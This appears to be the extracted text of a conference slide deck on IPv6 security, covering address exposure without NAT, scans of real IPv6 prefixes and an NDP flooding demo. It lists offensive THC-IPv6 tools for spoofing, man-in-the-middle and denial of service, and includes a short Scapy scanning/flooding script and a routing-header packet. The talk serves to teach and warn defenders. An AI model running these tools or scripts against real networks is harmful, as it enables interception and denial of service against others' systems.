1

Rafa Sanchez Gómez – CISA rafa@iniqua.com @r_a_ff_a_e_ll_o

A little bit of IPv6 security

2

1. Brief introduction to IPv6

2. Some security risks in IPv6

3. Research results

4. Demo

Seguridad en IPv6

3

1. Brief introduction to IPv6

4

Some interesting aspects of IPv6

The main driver for IPv6 is its

increased address space

IPv6 uses 128-bit addresses

There are different address types (unicast,

anycast, and multicast) and different address

scopes (link-local, global, etc.)

It’s common for a node to be using, at any given time,

several addresses, of multiple types and scopes.

5

Some interesting aspects of IPv6

The “end-to-end principle” …

Each device will have a

globally-unique address.

NATs will be no longer needed.

6

Hacking IPv6

7

Hacking IPv6 - parasite6: icmp neighbor solitication/advertisement spoofer, puts you as

man-in-the-middle, same as ARP mitm (and parasite)

- alive6: an effective alive scanng, which will detect all systems listening to

this address

- fake_router6: announce yourself as a router on the network, with the

highest priority

- redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever

icmp6 redirect spoofer

- toobig6: mtu decreaser with the same intelligence as redir6

- dos-new-ip6: detect new ip6 devices and tell them that their chosen IP

collides on the network (DOS).

- trace6: very fast traceroute6 with supports ICMP6 echo request and TCP-

SYN

- flood_router6: flood a target with random router advertisements

- flood_advertise6: flood a target with random neighbor advertisements

- exploit6: known ipv6 vulnerabilities to test against a target

- denial6: a collection of denial-of-service tests againsts a target

- fuzz_ip6: fuzzer for ipv6

- implementation6: performs various implementation checks on ipv6

- implementation6d: listen daemon for implementation6 to check behind a fw

- fake_mld6: announce yourself in a multicast group on the net

- fake_mld26: same but for MLDv2

8

Hacking IPv6

IPv6(dst="2a02:9001:0:ffff:80:58:105:253")/

IPv6ExtHdrRouting(type=0,addresses=["2a02:9001:0:57::6"])/ ICMPv6EchoRequest()

#!/usr/bin/pythonfrom

scapy.all import * def aleatorio():

ff=str(RandIP6()) ff=ff[20:39]

return ff

for i in range(1,100000): packet=IPv6(src="2001:5c0:1400:a:8000:0:580c:3aa",dst="2a02:9008:3:111:"

+(aleatorio()))/ICMPv6EchoRequest() send(packet,iface="sit1")

9

2. Some security risks in IPv6

10

IPv4 Attack Example

Internal

Network

Victim is

attacked !!!

11

IPv6 Connectivity Schema

Public Prefix

assigned 2a02:9008:3::/64

Administration

Administration

No NAT Needed with IPv6

No internal network needed

Direct connectivity

2a02:9008:3::1

12

IPv6 Phishing Attack Example

Public Prefix assigned

2a02:9008:3::/64

Default Passwords

Brute Force (Hydra) Exploit Known Vulnerabilities

Victim is

attacked !!!

2a02:9008:3::1

Don’t work

too hard

No scpecial vulnerability in

the routers is needed.

No interaction from the

clients is needed

13

Users also exposed

End-to-end model

2a02:9008:3::1

2a02:9008:3::a36:1

2a02:9008:3::a35:2

2a02:9008:3::a46:8

2a02:9008:3::a86:6

Vulnerable

services !!

14

3. Research results

15

Administration Services exposed in Internet

We made a research to check if this

was a real risk, and we discovered

that indeed it is…

We collected public information

avaliable in Internet about IPv6

prefixes asigned by LIRs

16

IPv4 Connectivity

17

Administration Services exposed in Internet

We Scanned some of those prefixes just

using nmap

Only some of the first IPs of each prefix…

18

Administration Services exposed in Internet

19

Administration Services exposed in Internet

Mail services in IPv6 SPAM nightmare is

coming…

20

4. Demo …

21

1. Windows 7

2. Linux (Backtrack)

3. Mac OS

Tunneling…

22

NDP

Public Prefix

2a02:9008:3:f0f0:/64

2a02:9008:3:f0f0:437:af0:665:8

2a02:9008:3:f0f0:889:acb:9999:1

2a02:9008:3:f0f0:7676:bbb:9:10 2a02:9008:3:f0f0:437:af0:665:8

2a02:9008:3:f0f0:437:af0:665:8

23

NDP Flooding … 2a02:9008:3:f0f0:437:af0:665:8

2a02:9008:3:f0f0:889:acb:9999:1

2a02:9008:3:f0f0:7676:bbb:9:10

2a02:9008:3:f0f0:437:af0:665:8

CAM Table

11:22:33:44:55:66 - 2a02:9008:3:f0f0:437:af0:665:8 66:55:44:33:22:11 - 2a02:9008:3:f0f0:7676:bbb:9:10

… - …

2a02:9008:3:f0f0:RAND Public Prefix

2a02:9008:3:f0f0:/64

24

NDP Flooding in action…

25

Questions ???

Rafa Sánchez Gómez rafa@iniqua.com @R_a_ff_a_e_ll_o

es.linkedin.com/in/rafasanchezgomez